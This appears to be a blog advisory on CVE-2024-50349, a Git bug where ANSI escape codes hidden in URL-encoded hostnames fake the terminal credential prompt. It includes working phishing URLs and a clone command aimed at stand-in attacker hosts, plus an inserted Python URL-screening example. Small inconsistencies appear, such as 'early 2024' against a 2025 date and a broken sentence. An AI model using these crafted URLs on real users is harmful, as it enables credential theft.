Git is the backbone of modern software development, powering version control for millions of projects worldwide. With its speed, flexibility, and broad adoption, it’s easy to forget that even trusted tools can have dangerous security holes. In early 2024, a serious vulnerability—CVE-2024-50349—was discovered in Git that exposed users to phishing when they used terminal-based credential prompts. Let’s break down how this attack works, how it could affect you, and what you need to do to stay protected.
The Problem: How Git Prints Out Hostnames in the Terminal
When Git needs a username or password (for HTTPS repositories, for example), it often asks directly in your terminal. To help you know where your credentials are going, Git prints the destination host:
Username for 'https://example.com':
But not everyone knows that the prompt could be manipulated. Git decodes any URL-encoded characters before displaying this host information, meaning those special codes in the URL become readable characters in your terminal.
That’s usually just a technicality—unless someone sneaks in something more malicious.
ANSI Escape Codes: What’s So Dangerous?
Terminals support ANSI escape codes, which can change how text looks or even move your cursor around. Attackers can inject these codes so that what you see isn’t what’s actually happening.
Imagine the URL in your .git/config looks like this:
[url "https://evil.com<ESCAPE_SEQUENCE>"]
insteadOf = https://trusted.com
When you try to push or pull, Git decodes the URL, and your terminal interprets the escape codes. This might clear the terminal line, overwrite the hostname, or hide what’s really happening—so it looks like you’re sending credentials to GitHub, but you’re really giving them to someone else.
The URL contains an ANSI code (\033[2K, for "erase line"):
https://user@evil.com%1b%5b2Kgithub.com/foo/bar.git
Git decodes %1b%5b2K to \033[2K. When the terminal sees \033[2K, it wipes the current input line. Now:
Username for 'https://evil.comgithub.com/foo/bar.git':
But what actually appears might only be:
Username for 'https://github.com/foo/bar.git':
So you think you’re at GitHub, not an attacker’s site!
1. Malicious Cloning
The attacker shares a repository URL with an embedded escape sequence that wipes or alters the terminal line:
git clone "https://attacker.com%1b[2Kgithub.com/repo.git"
When you interact
Username for 'https://attacker.comgithub.com/repo.git':
But the escape code means you see:
Username for 'https://github.com/repo.git':
You type your password, thinking you’re safe—but your secret is sent to the attacker.
- All Git users on terminals: Especially if you’re cloning from unknown or untrusted sources.
- Scripts and CI systems: If you handle raw URLs, you might get phished or have credentials stolen automatically.
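One way a script or CI job could screen repository URLs before handing them to Git, shown as an added example (it is not Git's fix and not code from the original post). The function names are hypothetical and the sample URLs are constructed from the ones in the text.

```python
from urllib.parse import unquote_to_bytes


def control_bytes(url: str) -> list[tuple[int, int]]:
    """Return (offset, byte) for each C0 control or DEL byte in the
    percent-decoded URL, i.e. the form that ends up in the prompt."""
    decoded = unquote_to_bytes(url)
    return [(i, b) for i, b in enumerate(decoded) if b < 0x20 or b == 0x7F]


def visible_form(url: str) -> str:
    """Decode the URL but keep '%' and every byte outside printable ASCII
    percent-encoded, so a terminal prints the sequence instead of acting on it."""
    decoded = unquote_to_bytes(url)
    return "".join(
        chr(b) if 0x20 <= b <= 0x7E and b != 0x25 else f"%{b:02x}"
        for b in decoded
    )


def screen(urls: list[str]) -> dict[str, str]:
    """Map each URL that must be rejected to a form that is safe to log."""
    return {u: visible_form(u) for u in urls if control_bytes(u)}


# Constructed sample input: the URLs from the text plus a benign one.
SAMPLE_URLS = [
    "https://user@evil.com%1b%5b2Kgithub.com/foo/bar.git",
    "https://attacker.com%1b[2Kgithub.com/repo.git",
    "https://github.com/foo/bar.git",
]

if __name__ == "__main__":
    for shown in screen(SAMPLE_URLS).values():
        print(f"rejected: {shown}")
```

Logging the re-encoded form rather than the raw URL matters: printing the decoded URL in a CI log viewed in a terminal would replay the same escape sequence.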
Official Patch
The fix was introduced in commits 7725b81 and c903985. Check the original bug report for details.
Upgrade using your package manager
# Ubuntu / Debian
sudo apt-get update && sudo apt-get install git
# macOS (Homebrew)
brew upgrade git
References & Further Reading
- CVE-2024-50349 - NVD
- Upstream Security Advisory
- Official Git Release Notes
- What are ANSI escape codes? (Wikipedia)
Final Words
CVE-2024-50349 is a reminder: even secure tools can be tricked in creative ways. Always keep your tools up to date, double-check unknown URLs, and don’t assume your terminal faithfully reports the truth. Protect your credentials—upgrade Git now!
Timeline
Published on: 01/14/2025 19:15:32 UTC
Last modified on: 01/21/2025 17:15:14 UTC